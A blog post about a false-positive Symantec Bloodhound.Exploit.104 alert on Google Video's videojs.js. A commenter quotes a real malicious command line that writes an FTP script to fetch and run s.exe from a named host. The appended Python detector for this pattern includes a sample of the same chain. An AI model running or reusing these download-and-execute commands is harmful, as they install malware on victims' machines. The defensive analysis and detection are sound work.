Bloodhound.Exploit.104

This evening I received several virus alerts from a computer indicating a Bloodhound.Exploit.104 infection in a file in the temporary internet files folder. The filename ended in “videojs.js”.
Bloodhound is Symantec Antivirus’s attempt at a heuristic detection. The writeup at the Symantec website indicates that Bloodhound.Exploit.104 is a heuristic detection for Microsoft Internet Explorer DHTML Node Normalize Vulnerability (as described in Microsoft Security Bulletin MS06-072).
A quick Google revealed that videojs.js is a JavaScript file used on the website video.google.com. A visit to that website, and soon I too had Symantec detecting Bloodhound.Exploit.104 (and the video would not load). I am using the 12/12 rev 19 virus definitions.
I looked at www.symantec.com/avcenter and found that there is a newer virus definition available. I used LiveUpdate to update to 12/12 rev 51. This seems to have solved the problem.

2 Comments

  1. This particular script acts as follows:
    it opens the run command, then the following
    %systemroot%\system32\cmd.exe
    then
    cmd /c echo open http://ftp.volja.net 21 >> ik &echo user uros777 bleh777 >> ik &echo binary >> ik &echo get s.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &s.exe &exit
    When I got infected I happened to be typing a search query in Google and that changed the focus of this script so the letters started self-typing into Google search box.

  2. That’s interesting, but I’m not following how it’s related. Have you seen what you’re reporting as bloodhound.exploit.104?
    In what I’m reporting, I know it’s a false positive because once I updated to the next def update, the files were scanned and restored from quarantine.
    What you’re seeing is similar to http://isc.sans.org/diary.php?storyid=1945&rss although it could really be anything.
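
The command line quoted in the first comment has a recognizable shape: `echo` builds an FTP script line by line, `ftp -s:` runs it, and the fetched file is then executed. The sketch below is an added example, not part of the original post or its comments, that flags that shape in logged command lines; the function name, the sample host and the sample credentials are constructed for illustration.

```python
import re

# FTP client commands that, echoed into a file, mark it as an "ftp -s:" script
FTP_VERBS = {"open", "user", "binary", "get", "mget", "bye", "quit"}
ECHO_RE = re.compile(r"^echo\s+(?P<text>.*?)\s*>{1,2}\s*(?P<file>\S+)$", re.I)
FTP_RE = re.compile(r"^ftp(?:\.exe)?\s+.*?-s:(?P<file>\S+)", re.I)

# Constructed sample with the same structure as the quoted command line
SAMPLE = ("cmd /c echo open ftp.example.test 21 >> ik &echo user demo demo >> ik "
          "&echo binary >> ik &echo get s.exe >> ik &echo bye >> ik "
          "&ftp -n -v -s:ik &del ik &s.exe &exit")


def analyze(cmdline):
    """Return findings for a cmd.exe line that builds and runs an FTP script."""
    scripts = set()   # files that received echoed FTP commands
    fetched = set()   # file names requested with "get"/"mget"
    findings = []
    for seg in (s.strip() for s in cmdline.split("&")):
        seg = re.sub(r"^cmd(?:\.exe)?\s+/c\s+", "", seg, flags=re.I)
        m = ECHO_RE.match(seg)
        if m:
            words = m["text"].split()
            if words and words[0].lower() in FTP_VERBS:
                scripts.add(m["file"].lower())
                if words[0].lower() in ("get", "mget") and len(words) > 1:
                    fetched.add(words[-1].lower())
            continue
        m = FTP_RE.match(seg)
        if m and m["file"].lower() in scripts:
            findings.append("ftp -s: runs script built by echo: " + m["file"])
            continue
        first = seg.split()[0].lower() if seg else ""
        # Only report execution once the scripted FTP transfer has been seen
        if first in fetched and findings:
            findings.append("executes file fetched over FTP: " + first)
    return findings


if __name__ == "__main__":
    for finding in analyze(SAMPLE):
        print(finding)
```

An `ftp -s:` call against a script that was not assembled on the same command line, or an `echo` redirect that writes no FTP commands, produces no findings.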
